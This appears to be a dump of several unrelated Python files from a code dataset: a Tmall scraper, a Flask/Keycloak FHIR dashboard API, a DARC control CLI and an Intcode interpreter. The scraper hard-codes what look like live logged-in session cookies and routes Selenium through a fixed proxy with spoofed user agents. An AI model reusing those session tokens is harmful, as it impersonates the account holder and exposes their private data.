res=scroll%3A1440*5485-client%3A1440*789-offset%3A1440*5485-screen%3A1440*900; pnm_cku822=098%23E1hvH9vUvbpvjQCkvvvvvjiPRLqhtjrbRLqpQjEUPmPysjYWP2chAjlURFM96j9Pvpvhvv2MMQyCvh1hNx9vITtGVB%2Bkaf90%2BktEnHsG1CywJhHTpYLZV1O07oDn9Wma%2BoHoEpchQC6tExhlBqev%2BulgEc6OfwkXdeQEVADlYbVrwZyaWXxrKphv8hCvvvvvvhCvphvZ99vvplXvpComvvC216CvHUUvvhn9phvZ99vvpGJivpvUphvhifEJ0R4EvpvVpyUU2E%2BXvphvCyCCvvvvv2yCvvBvpvvviQhvChCvCCp%3D; isg=BLq61pFZsrFqODnGWWrCECoAC-ZwfzRHEENi48SzI80Yt1rxrPmfVEvFAwPOJ7bd",
"referer": "https://list.tmall.com/search_product.htm?q=iiphone&type=p&vmarket=&spm=875.7931836%2FB.a2227oh.d100&from=mallfp..pc_1_searchbutton",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
# url = 'https://list.tmall.com/search_product.htm?q=三星+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton'
# url = 'https://list.tmall.com/search_product.htm?spm=a220m.1000858.0.0.4f585cb2WFk5MD&brand=30111&s=60&q=iphone+x&sort=s&style=g&from=.list.pc_1_searchbutton&smAreaId=110100&type=pc#J_Filter'
def first_page(url):
r = requests.get(url=url, headers=headers)
tree = etree.HTML(r.text)
div = tree.xpath('//div[@class="product-iWrap"]')
for li in div:
item = {}
# 价格
price = li.xpath('./p/em/@title')[0]
# 详情页链接
detail_href = 'http:' + li.xpath('./div/a/@href')[0]
# 商品id
product_id_detail = li.xpath('./div/a/@href')[0]
product_id = re.findall(r'\d+',product_id_detail)[0]
# 商品名称
product_name= li.xpath('./p/a/@title')[0]
# 商店名称
shop_name = str(li.xpath('./div[@class="productShop"]/a/text()')[0]).strip('\n')
# 月销量
try:
mon_sales = str(li.xpath('./p[@class="productStatus"]/span/em/text()')[0]).strip('\n')
except Exception as e:
mon_sales = '空'
# 评价数量
try:
comment_count = str(li.xpath('./p[@class="productStatus"]/span[2]/a/text()')[0])
except Exception as e:
comment_count = '空'
# 评价链接
try:
comment_href = 'http:'+str(li.xpath('./p[@class="productStatus"]/span[2]/a/@href')[0])
except Exception as e:
comment_href = '空'
item['price'] = price
item['detail'] = detail_href
item['shop_name'] = product_name
item['shop_name'] = shop_name
item['mon_sales'] = mon_sales
item['comment_count'] = comment_count
item['comment_href'] = comment_href
item['product_id'] = product_id
detaail_page(item)
# # mUA = 'User-Agent, Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1'
# mUA ="user-agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
# mWidth = 520
# mHeight = 20431
# PIXEL_RATIO = 3.0
#
# mobileEmulation = {"deviceMetrics": {"width": mWidth, "height": mHeight, "pixelRatio": PIXEL_RATIO},
# "userAgent": mUA}
#
#
# def create_chrome():
# ops = webdriver.ChromeOptions()
# ops.add_experimental_option('mobileEmulation', mobileEmulation)
# # ops.add_argument('--headless')
# # ops.add_argument('--disable-gpu')
#
# web = webdriver.Chrome(chrome_options=ops)
# web.set_page_load_timeout(10)
# web.set_script_timeout(10)
# web.set_window_size(mWidth, mHeight)
# return web
#
#
# driver = create_chrome()
from selenium.webdriver.chrome.options import Options
def get_chrome():
chrome_options = Options()
# chrome_options.add_argument('--headless')
# chrome_options.add_argument('--disable-gpu')
return webdriver.Chrome(chrome_options=chrome_options)
def detaail_page(item):
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "max-age=0",
"cookie": "cna=gY5GE8vPMGACASvgLWesBpgg; l=bBgQUK1lvHlc2bE_BOCg5uI81fb9kIRPguPRwGoei_5Q-1T-JB_OlkIbwe96Vj5P9bYB4R3ZAF9teFmT8PsV.; sm4=110100; enc=xzqpgSiaHaMOi%2BHzY%2BcQ8xIJ6jeSOrGpaJQ3yJ2MJm22hbDyWWnk1saajEjzUU5PAmCn0Kvw4fr%2FIX%2F6FkAhoA%3D%3D; lid=%E6%8F%90%E6%96%AF%E6%8B%89%E7%88%B8%E7%88%B8; uss=""; _m_h5_tk=1c56b3d37cd4403e000ffc74cbf0e4c9_1552207508287; _m_h5_tk_enc=b596a3c994e77edd8777cd0bdb03dc57; hng=CN%7Czh-CN%7CCNY%7C156; t=a3e60ff03b942db42bf59b62b90443e5; tracknick=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; lgc=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; _tb_token_=ff5667554a5e5; cookie2=1773b3ac32e4331c11fb93ca5d48c43d; uc1=cookie16=UIHiLt3xCS3yM2h4eKHS9lpEOw%3D%3D&cookie21=VT5L2FSpdiBh&cookie15=UtASsssmOIJ0bQ%3D%3D&existShop=false&pas=0&cookie14=UoTZ5icOEeoPwA%3D%3D&tag=8&lng=zh_CN; uc3=vt3=F8dByEvz36PVYahQBiM%3D&id2=UUphyu7opSokkbNd8Q%3D%3D&nk2=r7Qc2M7TAvy3RA%3D%3D&lg2=U%2BGCWk%2F75gdr5Q%3D%3D; _l_g_=Ug%3D%3D; ck1=""; unb=2200733418885; cookie1=W80vOuO9AY8m2yPvjGw2CQE%2B%2Bjh7a7z5PnzPvOgtEs0%3D; login=true; cookie17=UUphyu7opSokkbNd8Q%3D%3D; _nk_=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; csg=f8aceb36; skt=e95849fa038db48d; cq=ccp%3D0; pnm_cku822=098%23E1hvIvvUvbpvUpCkvvvvvjiPRLqUQjDvPFLhljrCPmPW6jDWP2cpgjYWRLFyQjnvRuwCvvpvvUmmkphvC99vvOHzB4yCvv9vvUm6EuavcbyCvm9vvvvvphvvvvvv9DCvpv1ZvvmmZhCv2CUvvUEpphvWDvvv9DCvpvQomphvLvs599vj7SLXS4ZAhjCwD7zOaXTAVA1l%2BExreTtYcgkQD70wd56JfaBl%2Bb8rwZHlYneYr2E9ZbmxfwoOd5ln%2B8c61EyXJZ%2FQ0f0DW3vCvpvVvvpvvhCv2QhvCvvvMMGtvpvhvvvvvv%3D%3D; isg=BKKiFjT8Cnk00xE-seKqKJII8y6o56wP-FtKO-w7z5XEv0M51IL_HV0t67vmrx6l",
"referer": "https://list.tmall.com/search_product.htm?q=iiphone+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
# print(item)
print(item['comment_href'])
# driver.get()
if item['comment_href'] != '空':
# r = requests.get(url=url, headers=headers)
# # time.sleep(5)
# # print(r.text)
# tree = etree.HTML(r.text)
# 'class="rate-grid"'
# tr_list = tree.xpath('//div[@class="rate-grid"]/table/tbody/tr')
# # print(len(tr_list))
# splash_render(item['comment_href'])
dirver_get_page(item['comment_href'])
# chrome 不好使
# driver = get_chrome()
# driver.get(item['comment_href'])
# time.sleep(30)
# print(driver.page_source)
def splash_render(url):
splash_url = "http://localhost:8050/render.html"
args = {
"url": url,
"timeout": 5,
"image": 0
}
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "max-age=0",
"cookie": "cna=gY5GE8vPMGACASvgLWesBpgg; l=bBgQUK1lvHlc2bE_BOCg5uI81fb9kIRPguPRwGoei_5Q-1T-JB_OlkIbwe96Vj5P9bYB4R3ZAF9teFmT8PsV.; sm4=110100; enc=xzqpgSiaHaMOi%2BHzY%2BcQ8xIJ6jeSOrGpaJQ3yJ2MJm22hbDyWWnk1saajEjzUU5PAmCn0Kvw4fr%2FIX%2F6FkAhoA%3D%3D; lid=%E6%8F%90%E6%96%AF%E6%8B%89%E7%88%B8%E7%88%B8; uss=""; _m_h5_tk=1c56b3d37cd4403e000ffc74cbf0e4c9_1552207508287; _m_h5_tk_enc=b596a3c994e77edd8777cd0bdb03dc57; hng=CN%7Czh-CN%7CCNY%7C156; t=a3e60ff03b942db42bf59b62b90443e5; tracknick=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; lgc=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; _tb_token_=ff5667554a5e5; cookie2=1773b3ac32e4331c11fb93ca5d48c43d; uc1=cookie16=UIHiLt3xCS3yM2h4eKHS9lpEOw%3D%3D&cookie21=VT5L2FSpdiBh&cookie15=UtASsssmOIJ0bQ%3D%3D&existShop=false&pas=0&cookie14=UoTZ5icOEeoPwA%3D%3D&tag=8&lng=zh_CN; uc3=vt3=F8dByEvz36PVYahQBiM%3D&id2=UUphyu7opSokkbNd8Q%3D%3D&nk2=r7Qc2M7TAvy3RA%3D%3D&lg2=U%2BGCWk%2F75gdr5Q%3D%3D; _l_g_=Ug%3D%3D; ck1=""; unb=2200733418885; cookie1=W80vOuO9AY8m2yPvjGw2CQE%2B%2Bjh7a7z5PnzPvOgtEs0%3D; login=true; cookie17=UUphyu7opSokkbNd8Q%3D%3D; _nk_=%5Cu63D0%5Cu65AF%5Cu62C9%5Cu7238%5Cu7238; csg=f8aceb36; skt=e95849fa038db48d; cq=ccp%3D0; pnm_cku822=098%23E1hvIvvUvbpvUpCkvvvvvjiPRLqUQjDvPFLhljrCPmPW6jDWP2cpgjYWRLFyQjnvRuwCvvpvvUmmkphvC99vvOHzB4yCvv9vvUm6EuavcbyCvm9vvvvvphvvvvvv9DCvpv1ZvvmmZhCv2CUvvUEpphvWDvvv9DCvpvQomphvLvs599vj7SLXS4ZAhjCwD7zOaXTAVA1l%2BExreTtYcgkQD70wd56JfaBl%2Bb8rwZHlYneYr2E9ZbmxfwoOd5ln%2B8c61EyXJZ%2FQ0f0DW3vCvpvVvvpvvhCv2QhvCvvvMMGtvpvhvvvvvv%3D%3D; isg=BKKiFjT8Cnk00xE-seKqKJII8y6o56wP-FtKO-w7z5XEv0M51IL_HV0t67vmrx6l",
"referer": "https://list.tmall.com/search_product.htm?q=iiphone+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36",
}
response = requests.get(splash_url, params=args, headers=headers)
# return response.text
print(response.text)
pcUA = ['Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
'Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5']
mWidth = 1440
mHeight = 2000
PIXEL_RATIO = 3.0
mobileEmulation = {"deviceMetrics": {"width": mWidth, "height": mHeight, "pixelRatio": PIXEL_RATIO},
"UserAgent": random.choice(pcUA)} # "userAgent": random.choice(pcUA)
def create_chrome():
ops = webdriver.ChromeOptions()
ops.add_experimental_option('mobileEmulation', mobileEmulation)
ops.add_argument('--proxy-server=218.60.8.99:3129')
# ops.add_argument('--headless')
# ops.add_argument('--disable-gpu')
web = webdriver.Chrome(chrome_options=ops)
web.set_page_load_timeout(10)
web.set_script_timeout(10)
web.set_window_size(mWidth, mHeight)
return web
driver = create_chrome()
def dirver_get_page(url):
driver.maximize_window()
# driver.get('https://detail.tmall.com/item.htm?id=584865383924&skuId=3951416717001&areaId=110100&user_id=902218705&cat_id=2&is_b=1&rn=289a6a85d6f5c3ca9cb4ea875d191f90&on_comment=1')
driver.get(url)
time.sleep(2)
print(driver.get_cookies())
time.sleep(20)
print(driver.page_source)
if __name__ == '__main__':
key = str(input('请输入关键字:'))
ul = 'https://list.tmall.com/search_product.htm?q={}+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton'
url = ul.format(key)
first_page(url)
|
15,997 | da0658b5fc5ce8e077644d70ad73ceaba4001897 | from datetime import datetime
from flask import (
Blueprint,
abort,
current_app,
jsonify,
make_response,
request,
safe_join,
send_from_directory,
)
import requests
from werkzeug.exceptions import Unauthorized
from dashboard.bearer_auth import BearerAuth
from dashboard.extensions import oidc
api_blueprint = Blueprint('dashboard-api', __name__)
def terminate_session():
"""Terminate logged in session; logout without response"""
token = oidc.user_loggedin and oidc.get_access_token()
if token and oidc.validate_token(token):
# Direct POST to Keycloak necessary to clear KC domain browser cookie
logout_uri = oidc.client_secrets['userinfo_uri'].replace(
'userinfo', 'logout')
data = {
'client_id': oidc.client_secrets['client_id'],
'client_secret': oidc.client_secrets['client_secret'],
'refresh_token': oidc.get_refresh_token()}
requests.post(logout_uri, auth=BearerAuth(token), data=data)
oidc.logout() # clears local cookie only
def validate_auth():
"""Verify state of auth token, raise 401 if inadequate
:returns: access token, if valid
"""
try:
token = oidc.get_access_token()
except TypeError:
# raised when the token isn't accessible to the oidc lib
raise Unauthorized("missing auth token")
if not oidc.validate_token(token):
terminate_session()
raise Unauthorized("invalid auth token")
return token
@api_blueprint.route('/', methods=["GET"])
@oidc.require_login
def main(methods=["GET"]):
""" Main route, entry point for react. """
validate_auth()
## issue with path resolution after build
return send_from_directory(
#todo: remove templates directory reference; index.html isn't a jinja template
safe_join(current_app.static_folder, 'templates'),
'index.html',
cache_timeout=-1
)
@api_blueprint.route('/validate_token', methods=["GET"])
def validate_token():
"""API to confirm header token is still valid
:returns: JSON with `valid` and `expires_in` (seconds) filled in
"""
try:
token = validate_auth()
except Unauthorized:
return jsonify(valid=False, expires_in=0)
expires = oidc.user_getfield('exp')
delta = expires - datetime.now().timestamp()
return jsonify(valid=True, expires_in=delta)
@api_blueprint.route('/<string:resource_type>', methods=["GET"])
def resource_bundle(resource_type, methods=["GET"]):
"""Query HAPI for resource_type and return as JSON FHIR Bundle
NB not decorated with `@oidc.require_login` as that does an implicit
redirect. Client should watch for 401 and redirect appropriately.
:param resource_type: The FHIR Resource type, i.e. `Patient` or `CarePlan`
:param search criteria: Include query string arguments to pass to HAPI
as additional search criteria. Example: /CarePlan?subject=Patient/8
"""
token = validate_auth()
url = current_app.config.get('MAP_API') + resource_type
params = {'_count': 1000}
params.update(request.args)
resp = requests.get(url, auth=BearerAuth(token), params=params)
try:
resp.raise_for_status()
except requests.exceptions.HTTPError as err:
abort(err.response.status_code, err)
return jsonify(resp.json())
@api_blueprint.route(
'/<string:resource_type>/<int:resource_id>', methods=["GET"])
def resource_by_id(resource_type, resource_id, methods=["GET"]):
"""Query HAPI for individual resource; return JSON FHIR Resource
NB not decorated with `@oidc.require_login` as that does an implicit
redirect. Client should watch for 401 and redirect appropriately.
"""
token = validate_auth()
url = f"{current_app.config.get('MAP_API')}{resource_type}/{resource_id}"
resp = requests.get(url, auth=BearerAuth(token))
try:
resp.raise_for_status()
except requests.exceptions.HTTPError as err:
abort(err.response.status_code, err)
return jsonify(resp.json())
@api_blueprint.route('/logout', methods=["GET"])
def logout(methods=["GET"]):
terminate_session()
message = 'Logged out. Return to <a href="/">Stayhome Dashboard</a>'
return make_response(message)
|
15,998 | 8f0a70c1dbcfedf0961c3290c83431b2ebf6e42f | #!/usr/bin/env python3
import os
import sys
from argparse import ArgumentParser, RawTextHelpFormatter
import yaml
import ast
import logging
import socket
import subprocess
import darc
from darc.definitions import CONFIG_FILE
# setup logger
logger = logging.getLogger('darc.control')
handler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
def send_command(timeout, service, command, payload=None, host='localhost', port=None):
"""
Send a command to the DARC master service
:param float timeout: Timeout for reply in seconds
:param str service: Service to send command to
:param str command: Which command to send
:param str payload: Payload for command (optional)
:param str host: Hostname to connect to (default: localhost)
:param int port: Port to connect to (default: get from DARC config file)
:return: reply from DARC master
"""
# define message as literal python dict
if payload:
message = "{{'service':'{}', 'command':'{}', 'payload':'{}'}}".format(service, command, payload)
else:
message = "{{'service':'{}', 'command':'{}'}}".format(service, command)
if port is None:
# read port from config
with open(CONFIG_FILE, 'r') as f:
master_config = yaml.load(f, Loader=yaml.SafeLoader)['darc_master']
port = master_config['port']
# connect to master
try:
master_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
master_socket.settimeout(timeout)
master_socket.connect((host, port))
except socket.error as e:
logger.error("Failed to connect to DARC master: {}".format(e))
return None
# send message
master_socket.sendall(message.encode())
reply = None
# receive reply unless stop_all was sent
if not command == 'stop_all':
try:
reply = master_socket.recv(1024).decode()
except socket.timeout:
logger.error("Did not receive reply before timeout")
else:
try:
reply = ast.literal_eval(reply)
except Exception as e:
logger.error("Failed to parse message ({}): {}".format(reply, e))
else:
if isinstance(reply, dict):
for key, value in reply.items():
logger.info("{}: {}".format(key, value))
else:
print(reply)
logger.info(reply)
# close connection
master_socket.close()
return reply
def main():
"""
DARC command line interface
This function is called by the darc executable
Run darc --help for usage
"""
# Check available services in config
with open(CONFIG_FILE, 'r') as f:
config = yaml.load(f, Loader=yaml.SafeLoader)['darc_master']
if config['mode'] == 'real-time':
services = config['services_master_rt'] + config['services_worker_rt']
elif config['mode'] == 'mixed':
services = config['services_master_mix'] + config['services_worker_mix']
else:
services = config['services_master_off'] + config['services_worker_off']
master_commands = config['master_commands']
service_commands = config['service_commands']
commands = list(set(master_commands + service_commands))
# Parse arguments
parser = ArgumentParser(formatter_class=RawTextHelpFormatter)
parser.add_argument('--service', type=str, help="Which service to interact with, "
" available services: {}, or all".format(', '.join(services)))
parser.add_argument('--timeout', type=int, default=10, help="Timeout for sending command "
"(Default: %(default)ss)")
parser.add_argument('--host', type=str, default='localhost', help="Host to send command to "
"(Default: %(default)s)")
parser.add_argument('--port', type=int, help="Port DARC listens to "
"(Default: determine from DARC config file)")
parser.add_argument('--parset', type=str, help="Observation parset (takes precedence over --config)")
parser.add_argument('--config', type=str, help="Node observation config")
parser.add_argument('--version', action="store_true", help="Print version info")
parser.add_argument('cmd', type=str, nargs='*', help="Command to execute. When using get_attr, add space "
"followed by attribute. Available commands: "
"{}".format(', '.join(commands)))
args = parser.parse_args()
# Print version and exit
if args.version:
logger.info(f"{darc.__version__}")
sys.exit(0)
# Check arguments
if not args.cmd:
logger.error("Add command to execute e.g. \"darc --service amber_listener status\"")
sys.exit(1)
cmd = args.cmd[0]
try:
attr = args.cmd[1]
except IndexError:
attr = None
if cmd not in commands:
logger.error("Unknown command: {}. Run darc -h to see available commands".format(cmd))
sys.exit(1)
elif not args.service and cmd not in master_commands:
logger.error("Argument --service is required for given command")
sys.exit(1)
# add attribute to command if get_attr is called
if attr is not None:
if cmd == 'get_attr':
cmd += f" {attr}"
else:
logger.error("Attribute can only be provided when using get_attr command")
sys.exit(1)
# If command is edit, open config in an editor
if cmd == 'edit':
with open(CONFIG_FILE, 'r') as f:
master_config = yaml.load(f, Loader=yaml.SafeLoader)['darc_master']
default_editor = master_config['editor']
editor = os.environ.get('EDITOR', default_editor)
ret = subprocess.Popen([editor, CONFIG_FILE]).wait()
if ret != 0:
logger.error("Editor did not exit properly")
else:
logger.info("Restart services to apply new settings, or run 'darc reload' to reload the master config.\n"
"WARNING: Restarting services aborts any running observation.\n"
"For services without queue server (i.e. all except LOFARTrigger and VOEventGenerator),\n"
"the config is automatically reloaded at the start of each observation.")
sys.exit(ret)
# Get payload
if args.parset:
payload = args.parset
elif args.config:
payload = args.config
else:
payload = None
if not send_command(args.timeout, args.service, cmd, host=args.host, port=args.port, payload=payload):
sys.exit(1)
|
15,999 | b9d4b5d4bf69a1a73569d95c88edd38aad6be704 | class Computer:
position = 0
nextStep = 0
resultPosition = 0
def __init__(self, commandArray, resultPosition):
self.data = commandArray
self.resultPosition = resultPosition
def addition(self):
self.data[self.data[self.position + 3]] = self.data[self.data[self.position + 1]] + self.data[self.data[self.position + 2]]
self.nextStep = 4
return self.data
def multiplication(self):
self.data[self.data[self.position + 3]] = self.data[self.data[self.position + 1]] * self.data[self.data[self.position + 2]]
self.nextStep = 4
return self.data
def close_computer(self):
print("Result:")
print(self.data[self.resultPosition])
print("Done with execution!")
return False
commands = {
1: addition,
2: multiplication,
99: close_computer
}
def next(self):
self.position = self.nextStep + self.position
command = self.data[self.position]
return self.commands[command](self)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.